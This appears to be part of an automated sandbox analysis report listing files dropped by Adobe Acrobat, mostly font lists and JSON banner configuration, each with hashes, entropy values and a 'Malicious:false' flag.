                                                              SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                              Malicious:false
                                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:PostScript document text
                                                              Category:dropped
                                                              Size (bytes):1233
                                                              Entropy (8bit):5.233980037532449
                                                              Encrypted:false
                                                              SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                              MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                              SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                              SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                              SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                              Malicious:false
                                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:PostScript document text
                                                              Category:dropped
                                                              Size (bytes):10880
                                                              Entropy (8bit):5.214360287289079
                                                              Encrypted:false
                                                              SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                              MD5:B60EE534029885BD6DECA42D1263BDC0
                                                              SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                              SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                              SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                              Malicious:false
                                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:PostScript document text
                                                              Category:dropped
                                                              Size (bytes):10880
                                                              Entropy (8bit):5.214360287289079
                                                              Encrypted:false
                                                              SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                              MD5:B60EE534029885BD6DECA42D1263BDC0
                                                              SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                              SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                              SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                              Malicious:false
                                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):295
                                                              Entropy (8bit):5.365670583512963
                                                              Encrypted:false
                                                              SSDEEP:6:YEQXJ2HXPWqCLvWmSg1c2LjcWkHvR0YntDoAvJM3g98kUwPeUkwRe9:YvXKXPWLVT5LjIPBsGMbLUkee9
                                                              MD5:45179BF7DEEF38F04A459285C76362AD
                                                              SHA1:4B4A8AD4B1B61F7CF32443B781FD0D85DD683C8E
                                                              SHA-256:8B6FE282E700DA768573BB65A5E24D1A0545AF8F2BCDD037F237D720405E618A
                                                              SHA-512:D46B2B3358A73837E6895EF9EFFF289996A59C19AD74F6DB4149FDC91957A914F71B14E25205F2BC0D699664268AB22A5DA257DE7A33BD0E128EB3C46FFCF633
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"e2c3d99b-546a-463d-84bb-e5438fb31543","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1733673094104,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):294
                                                              Entropy (8bit):5.319072244103573
                                                              Encrypted:false
                                                              SSDEEP:6:YEQXJ2HXPWqCLvWmSg1c2LjcWkHvR0YntDoAvJfBoTfXpnrPeUkwRe9:YvXKXPWLVT5LjIPBsGWTfXcUkee9
                                                              MD5:0EE41C339B705D452B9CF033466BE113
                                                              SHA1:2F32E9095B0627A6343A21C295977D685778D93B
                                                              SHA-256:55113B32BB4A18339DF4A3BEC0C8469181C0A7986C12FE88FE1C1955A9DEDABA
                                                              SHA-512:AE7B25298041E2255CE73B88B68BF7F18BFE64F95D4583BED9ECA056BA38C92CA01DB5CB2B5056CCC2E7D121749DAABD0F1CABFC53BBEC0D2096DCD09971414E
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"e2c3d99b-546a-463d-84bb-e5438fb31543","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1733673094104,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):294
                                                              Entropy (8bit):5.298067279498649
                                                              Encrypted:false
                                                              SSDEEP:6:YEQXJ2HXPWqCLvWmSg1c2LjcWkHvR0YntDoAvJfBD2G6UpnrPeUkwRe9:YvXKXPWLVT5LjIPBsGR22cUkee9
                                                              MD5:3F3D6ABD4AD3E8D48CAEA4C3E0301910
                                                              SHA1:895D4E97C798BB632C465C5B19CBDF84CCD8B9AF
                                                              SHA-256:4E5D9A2C1E4F78D9D8107E62F8629A2AF859EF2BC3BB3A65C8ECB1C32AB75D3D
                                                              SHA-512:1E29669C5F3E303DD3E5679ABDE6A7C47F0C351B66FC637A1242C40802B809B7B21871EADE903A7D3872A032B91EAEBA53711BFABACF05D9A3AD91B29240DCD8
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"e2c3d99b-546a-463d-84bb-e5438fb31543","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1733673094104,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):285
                                                              Entropy (8bit):5.346753570359275
                                                              Encrypted:false
                                                              SSDEEP:6:YEQXJ2HXPWqCLvWmSg1c2LjcWkHvR0YntDoAvJfPmwrPeUkwRe9:YvXKXPWLVT5LjIPBsGH56Ukee9
                                                              MD5:4ADD297022ACFFE50334132272AA8442
                                                              SHA1:750A30EEA7AC0E261B6DA38D8009CBBBCEF23D94
                                                              SHA-256:58E0F5686607CB09EDDDDD2899ECD81BAE65569848B73DEC9A94CD5847CF1321
                                                              SHA-512:7E2C4C1C47B9EBE2B68EBF6C318B3FF4DA0DCA07B0B9B941537596F50E0BF1D47C2B9F75DB6798858CA1B8870CAACDA2C1420FD3E5309243D7E33FC55108E142
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"e2c3d99b-546a-463d-84bb-e5438fb31543","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1733673094104,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):1123
                                                              Entropy (8bit):5.686761438673648
                                                              Encrypted:false
                                                              SSDEEP:24:Yv6XPWRT5XIzpLgE9cQx8LennAvzBvkn0RCmK8czOCCSnK:YvhLXahgy6SAFv5Ah8cv/nK
                                                              MD5:8B25ABBE1E9C3DBCB34D954FA9F0BC55
                                                              SHA1:66E81086B42B3A58E9C4897C77AB53DF13D353EF
                                                              SHA-256:904648EAE0CD03EAB5544B5B18942BEE16F0E4277CB967D76C7653884323A2B3
                                                              SHA-512:D17C84358734E32E8036C5CB41051793B04C1933BAEC1B7C4B1F3EDB062CE2ADD581F4072FB67D3384AD5A2B80D3053AA8158381B7D1E4C4B306643449FEA0F0
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"e2c3d99b-546a-463d-84bb-e5438fb31543","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1733673094104,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):1122
                                                              Entropy (8bit):5.684896679178683
                                                              Encrypted:false
                                                              SSDEEP:24:Yv6XPWRT5XIvVLgEwcp06ybnAvz7xHn0RCmK8czOCYHfl8zdBmK:YvhLX8FgSNycJUAh8cvYH1K
                                                              MD5:5D494E234B56EA3CDD5577A988C06421
                                                              SHA1:E42A602524E0E8C1598CF19E96F66B5E3AEE2856
                                                              SHA-256:18F967C925573EE9EBCC1356054F010F704D7D390F2C0DC09DE8B3D4CB458E6D
                                                              SHA-512:FC60CFB376E24B7421FDB245B2C09AA1232AD7EFE04303DD527F1FE635293F83DBAE441719D10BB588D9398678A4D1E6DE8A8B2E9CB8F7A35622E8B85017B782
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"e2c3d99b-546a-463d-84bb-e5438fb31543","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1733673094104,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Disc_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93181_288855ActionBlock_0","campaignId":93181,"containerId":"1","controlGroupId":"","treatmentId":"1aad653c-ef44-43f7-be1c-3a2ba2cf2cfc","variationId":"288855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Disc_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkNvbnZlcnQsIGVkaXQgYW5kIGUtc2lnblxuIFBERiBmb3JtcyAmIGFncmVlbWVudHMuIn0sInRjY
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):292
                                                              Entropy (8bit):5.3097887248506055
                                                              Encrypted:false
                                                              SSDEEP:6:YEQXJ2HXPWqCLvWmSg1c2LjcWkHvR0YntDoAvJfQ1rPeUkwRe9:YvXKXPWLVT5LjIPBsGY16Ukee9
                                                              MD5:D362E3B37BF7BCBB34FB34FDFDFF644A
                                                              SHA1:6229D1CCB6D2FE1B94CFCA6688EA606B2805C5A5
                                                              SHA-256:E0DEF2E553AFDD70830E0A7C403558EAE4D7786D29275C9F1457C4EC1CAB003B
                                                              SHA-512:D16D0E4B6DE7D27EFFD337554ED37DB3FF72936AB699953E058F0E3A4DBF0053683D5AC558679BA396F2CC42DA4953F2EEE02CB97341D78833F5ECB56ED78BC8
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"e2c3d99b-546a-463d-84bb-e5438fb31543","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1733673094104,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):1102
                                                              Entropy (8bit):5.675496769256343
                                                              Encrypted:false
                                                              SSDEEP:24:Yv6XPWRT5XI+2LgErcXWl7y0nAvzIBcSJCBViVmK:YvhLXhogH47yfkB5kVnK
                                                              MD5:F286F96F9B74412F4F9401230AA5C748
                                                              SHA1:B1F41DDF802A7F98B9960B1EAE3F9947597AA4D7
                                                              SHA-256:0515D95A125A5BDEF8B756E408E4AA152DCDDB35D5A310C133C4B0DF00CA533C
                                                              SHA-512:F7B4858169D35D4D9CBE365B407418A3795D580D78BEC95FBE3678CADCF224F6C8F9043A2894CE84E7BB47FC26C26346AF489CE0EB8360B7F077379FD16E5EBD
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"e2c3d99b-546a-463d-84bb-e5438fb31543","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1733673094104,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Edit_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93181_288855ActionBlock_1","campaignId":93181,"containerId":"1","controlGroupId":"","treatmentId":"533ab5eb-b236-4889-89a5-ac002261d71e","variationId":"288855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Edit_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkVkaXRQREZSZHJBcHBGdWxsIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTRweCIsImZvbnRfc3R5bGUiOiIwIn0sImRlc2NyaXB0aW9uX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTJweCIsImZvbnRfc3R5bGUiOiItMSJ9LCJ0aXRsZSI6bnVsbCwiZGVzY3JpcHRpb24iOiJFZGl0IHRleHQsIGltYWdlcywgcGFnZXMsIGFuZCBtb3JlLiJ9LCJ0Y2F0SWQiOm51bGx9","da
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):1164
                                                              Entropy (8bit):5.705174449547672
                                                              Encrypted:false
                                                              SSDEEP:24:Yv6XPWRT5XIyKLgEfIcZVSkpsn264rS514ZjBrwloJTmcVIsrSK5mK:YvhLXhEgqprtrS5OZjSlwTmAfSKMK
                                                              MD5:384048F40DA2D5DFF646A81BCF9FD8A0
                                                              SHA1:0D9418A53B4C9880F4D3CBE2CE457F6A9AFC18AA
                                                              SHA-256:C736FC6F1A0FA026160E134C54CE9C982455F2A580C8EEE84EAB757B5CC84D52
                                                              SHA-512:CEF96D3EA3C1D34D683465B7DF3E519928819FA0913A303837212718C52C0E63C00AB3379790D4B8973F78DE189CEB9D4A73583F80AC1EAF741A0B1C258D9135
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"e2c3d99b-546a-463d-84bb-e5438fb31543","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1733673094104,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Home_LHP_Trial_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85531_264848ActionBlock_0","campaignId":85531,"containerId":"1","controlGroupId":"","treatmentId":"ee1a7497-76e7-43c2-bb63-9a0551e11d73","variationId":"264848"},"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IlRyeSBBY3JvYmF0IFBybyJ9LCJ1aSI6eyJ0aXRsZV9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE1cHgiLCJmb250X3N0eWxlIjoiMCJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEzcHgiLCJmb250X3N0eWxlIjoiLTEifSwidGl0bGUiOiJGcmVlIHRyaWFsIiwiZGVzY3JpcHRpb24iOiJHZXQgdW5saW1pdGVkIGFjY2VzcyB0b1xucHJlbWl1bSBQREYgYW5kIGUtc2lnbmluZ1xudG9vbHMuIn0sImJhbm5lcl9zdHlsaW5nIjo
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):289
                                                              Entropy (8bit):5.32516780305737
                                                              Encrypted:false
                                                              SSDEEP:6:YEQXJ2HXPWqCLvWmSg1c2LjcWkHvR0YntDoAvJfYdPeUkwRe9:YvXKXPWLVT5LjIPBsGg8Ukee9
                                                              MD5:29A09587B07297367109B1DB38E59EF2
                                                              SHA1:EA572652448B75CACBFAC24BD3622145E46ECE8B
                                                              SHA-256:D438B9128425856F5C771D15958E164FE4E5AD062A8A24098A45A9CA37C8ECB8
                                                              SHA-512:5DB68B660BF2B2C56E7A6390A00D746AA2EDE256CBDB5F350400321B25925C5FF4511BBE707B5ABCEF6946CD5FBDBE89E238451E7842A78805FDC88DB07293D4
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"e2c3d99b-546a-463d-84bb-e5438fb31543","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1733673094104,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):284
                                                              Entropy (8bit):5.311960261932134
                                                              Encrypted:false
                                                              SSDEEP:6:YEQXJ2HXPWqCLvWmSg1c2LjcWkHvR0YntDoAvJf+dPeUkwRe9:YvXKXPWLVT5LjIPBsG28Ukee9
                                                              MD5:184D78DAB76C9F0EEF107B4CA88076AF
                                                              SHA1:5A28331919937C1FBC4F19C04FB41A7AA14BD137
                                                              SHA-256:830D08E30600DB91EF74E5CF3AE50A51C98FD6CFB854BE77D64BD288CDF40051
                                                              SHA-512:D4DCD505A70083A8DE517573A9ECCF792D0C7F048E3E25A66AD9F065592529DD9646348038FA88047E6122DCCF1997EBAC559C1C7F1E4DEB657F0741D5982AED
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"e2c3d99b-546a-463d-84bb-e5438fb31543","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1733673094104,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):291
                                                              Entropy (8bit):5.308541926139774
                                                              Encrypted:false
                                                              SSDEEP:6:YEQXJ2HXPWqCLvWmSg1c2LjcWkHvR0YntDoAvJfbPtdPeUkwRe9:YvXKXPWLVT5LjIPBsGDV8Ukee9
                                                              MD5:176EB806F2ECBD8A26892422EF9910BD
                                                              SHA1:AB4D70EF2905C28DB1BB866D29C19EA2FABAA749
                                                              SHA-256:3EBD0496D4E4E89AA34967F46BFDFEEB330507D36C73A7DE112C278778B5734C
                                                              SHA-512:63E8CBCF3923DED05BC55335349E62EFE585ED5C59978EDC1362A2513CA22C46AD12887833B471CC75443E9BA57A674020C689E8AAE21ED70B9B1EBD8795A227
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"e2c3d99b-546a-463d-84bb-e5438fb31543","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1733673094104,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):287
                                                              Entropy (8bit):5.3006502136332925
                                                              Encrypted:false
                                                              SSDEEP:6:YEQXJ2HXPWqCLvWmSg1c2LjcWkHvR0YntDoAvJf21rPeUkwRe9:YvXKXPWLVT5LjIPBsG+16Ukee9
                                                              MD5:23C408D8808F04EFCEC948FBD4BF3BF7
                                                              SHA1:A234ED175F60FC4E0359B891B24C78F213FBCA34
                                                              SHA-256:3FF4A0A83C1CBDCDA5FB75058B0B123B547552448CEE139B19897C39918226C5
                                                              SHA-512:47660F1F6DD6D020293BEF83149E173BAE329ADBB506AD0EE03B20FAF92BA5A272028E995A464ECB1F45A8DE1F2C628D6AC2A0859F569EC103EE7A1B95235551
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"e2c3d99b-546a-463d-84bb-e5438fb31543","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1733673094104,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):1090
                                                              Entropy (8bit):5.664520863240313
                                                              Encrypted:false
                                                              SSDEEP:24:Yv6XPWRT5XIDamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSnK:YvhLXIBgkDMUJUAh8cvMnK
                                                              MD5:73BBD7D492774CC54BB5971BBBEE5F17
                                                              SHA1:00F863189559A51A35BF08D4190E52FF3E496EC0
                                                              SHA-256:D1EC59200479A0A7D450A0C1F1BC7C71AC84FB37AD9339A22672E8D987205312
                                                              SHA-512:36000E7496586ECF84E739CAD6A24B30DEF164736A8C197ABD02EAD69917E9E23D6C8844B8851F3248DEFB2AEBB9B6B8282285D82BB7B21A3F6D434F764EF006
                                                              Malicious:false
